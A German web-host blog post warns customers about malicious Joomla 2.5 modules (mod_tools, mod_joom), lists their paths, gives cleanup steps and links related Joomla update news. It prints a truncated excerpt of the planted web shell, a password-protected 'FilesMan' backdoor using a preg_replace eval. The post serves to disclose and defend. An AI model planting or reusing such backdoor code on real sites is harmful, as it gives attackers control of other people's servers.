Bewertung: 5 / 5

Stern aktivStern aktivStern aktivStern aktivStern aktiv
 
Joomla Hack Security

Wieder tauchen auf einigen unserer Kundenaccounts fremde Dateien auf. Aktuell handelt es sich um Module die in Joomla 2.5 installiert wurden. mod_tools und mod_joom können also gefährliche Inhalte haben!!!

Liste der Hacker-Dateien

~/modules/mod_tools/mod_tools.php
~/modules/mod_joom/mod_joom.php

Inhalt der mod_tools.php

<?php #
$auth_pass = "549f1673cebe855799612017b0242e4386";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e",ippq(...)Kn6fwE='\x29\x29\x29\x3B",".");?>

Im Backend erscheinen unter Module auch unbekannte Einträge wie "System", "System1" und "Tools". Diese sollten schnellstmöglich deaktiviert werden. Danach via FTP prüfen ob die Ordner "mod_tools" und "mod_joom" aus dem Verzeichnis "modules" gelöscht wurden.

Häufig werden im Stammverzeichnis php-Dateien gefunden. Wenn außer der "index.php" und der "configuration.php" noch weitere PHP-Dateien zu finden sind sollten diese geprüft werden. Es handelt sich dann nicht um Joomla-Corde Dateien.

Bei anderen Beiträgen haben wir bereits Tipps für sichere Joomla Webseiten gegeben. Neben dem Joomla hmei7 Hack haben wir auch Hinweise für die Beseitigung des Joomla base64 Hacks gegeben. Wenn Sie diese Hinweise beachten sollte Ihre Webseite sicher sein.

Joomla 3.8 wurde veröffentlicht und brin…

Joomla 3.8 Veröffentlicht

Das neue Joomla Routing System Mit Joomla 3.8 wird ein neues Routing-System eingeführt, das mehr Kontrolle über die URL-Struktur gibt. Damit ist es nun endlich möglich, IDs aus den URLs zu...

Read more

Joomla 3.7 wurde veröffentlicht

Joomla 37 Update

Am 25. April wurde die neuste Version des beliebten CMS Joomla veröffentlicht. Lang erwartet wurden die mehr als 700 Verbesserungen und 1300 Änderungen am System.

Read more

Joomla $nsvilbn Hack

Joomla Wordpress Hacked

Auf ein paar Webseiten unserer Kunden ist ein neuer Hack ähnlich dem base64_decode Hack aufgetaucht. Auch dieser scheint sich über eine eingeschleuste Datei auf dem gesamten Webspace zu verbreiten. In...

Read more

Joomla Update 3.6.1 veröffentlicht

Joomla 3.6.1 Update

Nicht lang nach der Veröffentlichung des großen Updates auf Joomla 3.6 erschien heute das kleine Update auf Joomla 3.6.1. Neben zahlreichen BugFixes schließt es aber auch ein paar Sicherheitslücken.

Read more

Joomla 3.6 kommt mit Neuerungen in Backe…

Joomla 3.6 Update

Das neue Joomla 3.6 wurde heute veröffentlicht und bietet einige neue Features für das Backend. So bringt Joomla einige Verbesserungen für die Verwaltung und User-Experience.

Read more

Joomla 3.5.1 Bugfix veröffentlicht

Joomla Bugfix

Knapp zwei Wochen nach Veröffentlichung der neuen Joomla Version 3.5 erscheint ein Bugfix Release.

Read more

Joomla 3.5 ist verfügbar

Joomla 3.5 Update veröffentlicht

Nun ist es soweit – Joomla 3.5 ist veröffentlicht worden. Eine Revolution ist es nicht, bringt aber doch einige Verbesserungen und neue Features mit. Beim Aktualisieren ist jedoch Vorsicht geboten...

Read more

Updates und Bug fixes für Wordpress 4 un…

Joomla 3 Updates Wordpress 4 Updates

Nachdem im Update-Wahnsinn nun etwas Ruhe eingekehrt ist, möchten wir etwas Licht ins Dunkle bringen – was war da eigentlich los bei Joomla? Update nach Update nach Update?!?

Read more

Update für Wordpress und Joomla veröffen…

Joomla und Wordpress Update veröffentlicht

Joomla 3.4.6 und 3.5 Beta Heute wurde ein wichtiges Sicherheitsupdate für Joomla 3.4 veröffentlicht. Dabei können Angreifer dem System Code unterjubeln und diesen ausführen. Das Joomla-Team stuft den Schwergrad der Lücke...

Read more